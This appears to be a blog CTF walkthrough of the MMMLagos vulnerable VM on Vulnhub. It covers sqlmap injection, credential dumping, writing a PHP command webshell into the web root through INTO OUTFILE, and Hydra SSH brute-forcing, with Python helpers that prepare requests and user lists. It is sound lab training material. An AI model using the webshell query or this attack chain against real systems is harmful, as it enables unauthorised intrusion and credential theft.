MMMLagos 1.1 CTF Walkthrough
This write-up is about a vulnerable web application on Vulnhub called MMMLagos. The author describes it as follows: “MMMLAGOS is a vulnerable ponzing scheme with lot of vulnerabilities” (Silex, 2017). I had never done a similar write-up before this, so forgive any blunders.
At first I had some challenges downloading the VM image because it kept getting corrupted. I was downloading the one hosted on the author’s website instead of the one hosted on Vulnhub, because Vulnhub doesn’t support multi-threaded download and the connection always dropped before the download completed. I even met the author when I visited Abuja and he gave me a copy on a flash drive, but that copy was different from the one uploaded to Vulnhub and several gigabytes larger. Eventually I managed to download the image from Vulnhub successfully and checked the file checksum, which matched.
So I set out to see what I could find and imported the VM image into Oracle VirtualBox. After booting the virtual machine I was presented with the console login prompt. I tried to guess the root password but was wrong.
I opened a terminal and used netdiscover to find the IP of the VM.

I then mapped the IP to the hostname mmmlagos.local (in /etc/hosts) and fired up nmap to enumerate the services running on the VM.
Knowing there was a web server on ports 80 and 443, I opened the service on port 80 and was presented with the application’s landing page.
Since I didn’t have any credentials to log in to the running web application, I decided to sign up and clicked “Join Now”. I signed up with test details; there were other fields that could not fit in the window.

After signing up I logged in to the application, but first set up the Burp Suite proxy so that all requests went through Burp. I looked through the Burp history for hidden directories but found nothing out of the ordinary. Then I checked whether the login page parameters were vulnerable to SQL injection: I copied the login POST request from the Burp history, saved it to a file and fed that to SQLMap with -r. To my surprise, SQLMap could not find any injection.
I checked the request saved from the Burp history and noticed that some of the POST data was URL-encoded. I used Burp Decoder to decode it and edited the file to reflect the changes.
I tried again with SQLMap and this time the password parameter was found to be vulnerable to SQL injection, and I was able to dump the databases. There were a couple of databases; the current database was ponzi and the application connected as the MySQL root user. That suggested the DB user would have write access to the database and, as root, the FILE privilege needed to write files on the server.
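The manual Burp Decoder step above (decode the percent-encoded form body, then hand the file to sqlmap -r) can be made repeatable with a small script. This is an added example, not code from the post: the sample request, host, path and field names are constructed and do not reproduce the real MMMLagos login request. It also fixes Content-Length after decoding and reports fields whose decoded value contains a form delimiter, since those cannot be written back unencoded without changing how the server parses the form.

```python
#!/usr/bin/env python3
"""URL-decode the form body of a raw HTTP request saved from Burp.

Added example (not code from the post): reproduces the manual Burp Decoder
step before handing the file to `sqlmap -r request.txt`. Decoded values that
contain '&', '=' or '+' are reported, because writing them back unencoded
would change how the form is parsed.
"""
import re
import sys
from urllib.parse import parse_qsl

# Constructed sample request; host, path and field names are assumptions,
# not the real MMMLagos login request.
SAMPLE_REQUEST = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: mmmlagos.local\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 46\r\n"
    "\r\n"
    "username=test%40example.com&password=P%40ss%21"
)

CONTENT_LENGTH = re.compile(r"^(Content-Length:\s*)\d+", re.IGNORECASE | re.MULTILINE)


def split_request(raw):
    """Split a raw request into (head, body); head keeps the blank line that
    terminates the headers. Accepts CRLF or bare LF line endings."""
    for sep in ("\r\n\r\n", "\n\n"):
        if sep in raw:
            head, body = raw.split(sep, 1)
            return head + sep, body
    return raw, ""


def decode_form_body(body):
    """Percent-decode every name and value of an x-www-form-urlencoded body.

    Returns (decoded_body, ambiguous) where ambiguous lists the fields whose
    decoded name or value contains a form delimiter ('&', '=' or '+')."""
    pairs = parse_qsl(body.strip("\r\n"), keep_blank_values=True)
    ambiguous = [name for name, value in pairs
                 if any(c in name + value for c in "&=+")]
    decoded = "&".join(f"{name}={value}" for name, value in pairs)
    return decoded, ambiguous


def rewrite_request(raw):
    """Return (rewritten_request, ambiguous_fields) with the body decoded and
    Content-Length corrected so the request stays well formed."""
    head, body = split_request(raw)
    decoded, ambiguous = decode_form_body(body)
    head = CONTENT_LENGTH.sub(lambda m: m.group(1) + str(len(decoded.encode())), head)
    return head + decoded, ambiguous


if __name__ == "__main__":
    # Usage: decode_request.py burp_request.txt > decoded_request.txt
    source = open(sys.argv[1], newline="").read() if len(sys.argv) > 1 else SAMPLE_REQUEST
    rewritten, ambiguous = rewrite_request(source)
    sys.stdout.write(rewritten)
    if ambiguous:
        sys.stderr.write("fields that cannot be written back unencoded: %s\n" % ", ".join(ambiguous))
```

Run it on the file saved from Burp and feed the output to sqlmap -r; if it reports ambiguous fields, leave those values encoded and decode only the rest by hand.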

I tried to get an OS shell with SQLMap (--os-shell) but it didn’t work. I also tried to read /etc/passwd (--file-read) to determine the local users so I could run a brute-force attack against the SSH service, but that didn’t work either. So I dumped the web application’s admin password, which was stored in clear text, and the MySQL users’ password hashes (the mysql.user table in MySQL 4.1 and later stores SHA-1 based mysql_native_password hashes, not MD5). SQLMap cracked the phpmyadmin user’s hash but not root’s; I cracked the root hash on the Hashkiller website. Since I already knew the web application admin password, I visited the admin page at /admin.php, was redirected to adminlogin.php, logged in as admin and was presented with the first flag.
I logged out of the admin dashboard, visited the phpMyAdmin login page and logged in as root. I was trying to figure out how to get a shell on the web server to enumerate the local users. Then I came across this article that says we can run an SQL statement to create a PHP command shell in the web server’s document root. Since I already knew this was an Ubuntu web server, the web root should be /var/www/html. I ran the query SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/backdoor.php" (the path must be absolute; a relative path is resolved against the MySQL data directory). This only works because the database user has the FILE privilege, secure_file_priv does not restrict output locations (newer MySQL builds default it to a dedicated directory or disable file writes entirely) and the mysql OS user can write to the web root. I opened the file in the browser, which showed nothing on its own, then passed ls as the cmd parameter and the directories and files in the web root were listed.
I proceeded to cat the /etc/passwd file and voila, there it was.
I created a file with the list of users found that can log in and have home directories, and downloaded a wordlist of common passwords. I fed both to Hydra to brute-force the SSH login. After a while, the password for user naijaseccon was found.
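Turning the /etc/passwd dump into the user list for Hydra is a filtering job: keep accounts with an interactive shell and a home directory, drop system accounts. Below is an added example that does this, not code from the post; the passwd excerpt and account names are constructed and are not the real contents of the MMMLagos VM.

```python
#!/usr/bin/env python3
"""Pick SSH brute-force candidates out of /etc/passwd output.

Added example (not code from the post): keeps only accounts with an
interactive shell and a home directory, which is the list the post says
was handed to Hydra.
"""
import sys

# Constructed /etc/passwd excerpt with assumed account names; it is not the
# real content dumped from the MMMLagos VM.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:115:123:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
deploy:x:1001:1001::/home/deploy:/bin/sh
svc:x:1002:1002::/home/svc:/usr/sbin/nologin
"""

# Shells that end a session immediately; anything else is treated as interactive.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync",
                  "/bin/true", "/usr/bin/false"}


def parse_passwd(text):
    """Yield (user, uid, home, shell) for every well-formed passwd line."""
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # skip blank, truncated or garbled lines (e.g. from a webshell)
        yield fields[0], int(fields[2]), fields[5], fields[6]


def login_users(text, include_root=True):
    """Accounts that can log in interactively and have a home under /home
    (root is kept by default since its home is /root). Accounts with a
    nologin-style shell are dropped."""
    users = []
    for user, uid, home, shell in parse_passwd(text):
        if not shell or shell in NOLOGIN_SHELLS:
            continue
        if uid == 0:
            if include_root:
                users.append(user)
            continue
        if home.startswith("/home/"):
            users.append(user)
    return users


if __name__ == "__main__":
    # Read the passwd file captured via the webshell (or use the sample) and
    # write one user per line, ready for:
    #   hydra -L users.txt -P passwords.txt -t 4 ssh://mmmlagos.local
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    print("\n".join(login_users(text)))
```

Whether to keep root in the list depends on the target: many Ubuntu sshd configurations refuse root password logins, so dropping it with include_root=False saves a whole wordlist pass.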
I SSHed to the server and the SSH login banner revealed yet another flag.
I checked whether user naijaseccon was a member of the sudo group (id and sudo -l), and it was. With sudo I could read any file on the server, so I listed the users under /home, changed into the home directory of user Cashnaija and found a file named Classified.txt. I catted the file and the third flag was at the bottom.
There was already a hint on the web application’s /flag.htm page that there were 3 flags. The flags looked like hashes of different types, but I didn’t try to crack them as there was no need; I’d be glad to know their plain text if anyone is willing to crack them. There was also no need to run a local privilege-escalation exploit since our user already had sudo.
And this was how MMMLagos CTF flags were captured. You can leave some good claps. Thank you for taking your time to read this.